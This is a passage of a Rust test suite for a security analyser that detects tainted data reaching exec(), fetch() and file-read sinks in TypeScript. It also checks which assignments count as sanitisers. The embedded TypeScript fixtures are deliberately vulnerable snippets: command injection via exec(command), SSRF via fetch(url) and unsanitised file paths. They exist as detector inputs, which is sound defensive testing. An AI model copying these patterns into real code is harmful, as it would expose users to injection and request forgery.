1093    // ── Tests requiring tree-sitter AST (multi-line, TSX, accurate positions) ──
1094
1095    #[cfg(feature = "typescript")]
1096    #[test]
1097    fn detects_multiline_exec_call() {
1098        let code = r#"
1099function runCommand(command: string) {
1100    exec(
1101        command,
1102        { encoding: "utf-8" }
1103    );
1104}
1105"#;
1106        let parsed = TypeScriptParser
1107            .parse_file(Path::new("test.ts"), code)
1108            .unwrap();
1109        assert_eq!(parsed.commands.len(), 1);
1110        assert!(matches!(
1111            parsed.commands[0].command_arg,
1112            ArgumentSource::Parameter { .. }
1113        ));
1114    }
1115
1116    #[cfg(feature = "typescript")]
1117    #[test]
1118    fn detects_multiline_fetch() {
1119        let code = r#"
1120async function sendData(url: string) {
1121    const resp = await fetch(
1122        url,
1123        {
1124            method: "POST",
1125            body: JSON.stringify({ key: "value" }),
1126        }
1127    );
1128    return resp.json();
1129}
1130"#;
1131        let parsed = TypeScriptParser
1132            .parse_file(Path::new("test.ts"), code)
1133            .unwrap();
1134        assert_eq!(parsed.network_operations.len(), 1);
1135        assert!(matches!(
1136            parsed.network_operations[0].url_arg,
1137            ArgumentSource::Parameter { .. }
1138        ));
1139    }
1140
1141    #[cfg(feature = "typescript")]
1142    #[test]
1143    fn detects_nested_callback_exec() {
1144        let code = r#"
1145function runCommand(command: string): Promise<string> {
1146    return new Promise((resolve, reject) => {
1147        exec(command, (error, stdout) => {
1148            if (error) reject(error);
1149            resolve(stdout);
1150        });
1151    });
1152}
1153"#;
1154        let parsed = TypeScriptParser
1155            .parse_file(Path::new("test.ts"), code)
1156            .unwrap();
1157        assert_eq!(parsed.commands.len(), 1);
1158        assert!(matches!(
1159            parsed.commands[0].command_arg,
1160            ArgumentSource::Parameter { .. }
1161        ));
1162    }
1163
1164    #[cfg(feature = "typescript")]
1165    #[test]
1166    fn accurate_line_numbers() {
1167        let code = r#"
1168// line 2
1169// line 3
1170function dangerous(cmd: string) {
1171    exec(cmd);
1172}
1173"#;
1174        let parsed = TypeScriptParser
1175            .parse_file(Path::new("test.ts"), code)
1176            .unwrap();
1177        assert_eq!(parsed.commands.len(), 1);
1178        // exec(cmd) is on line 5
1179        assert_eq!(parsed.commands[0].location.line, 5);
1180    }
1181
1182    #[cfg(feature = "typescript")]
1183    #[test]
1184    fn handles_tsx_file() {
1185        let code = r#"
1186import React from "react";
1187
1188const Component = ({ url }: { url: string }) => {
1189    const data = fetch(url);
1190    return <div>{data}</div>;
1191};
1192"#;
1193        let parsed = TypeScriptParser
1194            .parse_file(Path::new("component.tsx"), code)
1195            .unwrap();
1196        assert_eq!(parsed.network_operations.len(), 1);
1197        assert!(matches!(
1198            parsed.network_operations[0].url_arg,
1199            ArgumentSource::Parameter { .. }
1200        ));
1201    }
1202
1203    // ── Cross-file support tests ──
1204
1205    #[test]
1206    fn extracts_function_defs() {
1207        let code = r#"
1208export async function readFileContent(filePath: string) {
1209    return fs.readFile(filePath, "utf-8");
1210}
1211
1212function internalHelper(x: number) {
1213    return x + 1;
1214}
1215"#;
1216        let parsed = TypeScriptParser
1217            .parse_file(Path::new("lib.ts"), code)
1218            .unwrap();
1219        assert!(parsed.function_defs.len() >= 2);
1220        let exported = parsed
1221            .function_defs
1222            .iter()
1223            .find(|d| d.name == "readFileContent");
1224        assert!(exported.is_some());
1225        assert!(exported.unwrap().is_exported);
1226        assert_eq!(exported.unwrap().params, vec!["filePath"]);
1227
1228        let internal = parsed
1229            .function_defs
1230            .iter()
1231            .find(|d| d.name == "internalHelper");
1232        assert!(internal.is_some());
1233        assert!(!internal.unwrap().is_exported);
1234    }
1235
1236    #[test]
1237    fn extracts_call_sites() {
1238        let code = r#"
1239async function handler(args: any) {
1240    const validPath = await validatePath(args.path);
1241    const content = await readFileContent(validPath);
1242    return content;
1243}
1244"#;
1245        let parsed = TypeScriptParser
1246            .parse_file(Path::new("index.ts"), code)
1247            .unwrap();
1248        assert!(!parsed.call_sites.is_empty());
1249        let rfc_call = parsed
1250            .call_sites
1251            .iter()
1252            .find(|cs| cs.callee == "readFileContent");
1253        assert!(rfc_call.is_some(), "Should find readFileContent call site");
1254    }
1255
1256    #[test]
1257    fn detects_sanitizer_assignment() {
1258        let code = r#"
1259async function handler(args: any) {
1260    const validPath = await validatePath(args.path);
1261    const content = await readFileContent(validPath);
1262    return content;
1263}
1264"#;
1265        let parsed = TypeScriptParser
1266            .parse_file(Path::new("index.ts"), code)
1267            .unwrap();
1268        assert!(parsed.sanitized_vars.contains("validPath"));
1269
1270        // The call to readFileContent(validPath) should classify validPath as Sanitized
1271        let rfc_call = parsed
1272            .call_sites
1273            .iter()
1274            .find(|cs| cs.callee == "readFileContent");
1275        assert!(rfc_call.is_some());
1276        let rfc = rfc_call.unwrap();
1277        assert!(!rfc.arguments.is_empty());
1278        assert!(
1279            matches!(&rfc.arguments[0], ArgumentSource::Sanitized { .. }),
1280            "validPath should be classified as Sanitized, got: {:?}",
1281            rfc.arguments[0]
1282        );
1283    }
1284
1285    #[test]
1286    fn sanitized_var_from_path_resolve() {
1287        let code = r#"
1288function processFile(rawPath: string) {
1289    const safePath = path.resolve(rawPath);
1290    fs.readFileSync(safePath, "utf-8");
1291}
1292"#;
1293        let parsed = TypeScriptParser
1294            .parse_file(Path::new("test.ts"), code)
1295            .unwrap();
1296        assert!(parsed.sanitized_vars.contains("safePath"));
1297    }
1298
1299    #[test]
1300    fn url_parse_assignment_is_not_sanitized_for_ssrf() {
1301        let code = r#"
1302async function handler(args: { url: string }) {
1303    const parsedUrl = URL.parse(args.url);
1304    return fetch(parsedUrl);
1305}
1306"#;
1307        let parsed = TypeScriptParser
1308            .parse_file(Path::new("test.ts"), code)
1309            .unwrap();
1310
1311        assert!(!parsed.sanitized_vars.contains("parsedUrl"));
1312        assert_eq!(parsed.network_operations.len(), 1);
1313        assert!(
1314            parsed.network_operations[0].url_arg.is_tainted(),
1315            "URL.parse output must remain tainted for network sinks"
1316        );
1317    }
1318
1319    #[test]
1320    fn redaction_assignment_is_not_sanitized_for_file_paths() {
1321        let code = r#"
1322function redactSecret(value: string): string {
1323    return value.replace(/secret/g, "[REDACTED]");
1324}
1325
1326function handler(args: { path: string }) {
1327    const redactedPath = redactSecret(args.path);
1328    return fs.readFileSync(redactedPath, "utf-8");
1329}
1330"#;
1331        let parsed = TypeScriptParser
1332            .parse_file(Path::new("test.ts"), code)
1333            .unwrap();
1334
1335        assert!(!parsed.sanitized_vars.contains("redactedPath"));
1336        assert_eq!(parsed.file_operations.len(), 1);
1337        assert!(
1338            parsed.file_operations[0].path_arg.is_tainted(),
1339            "redaction output must remain tainted for file path sinks"
1340        );
1341    }
1342}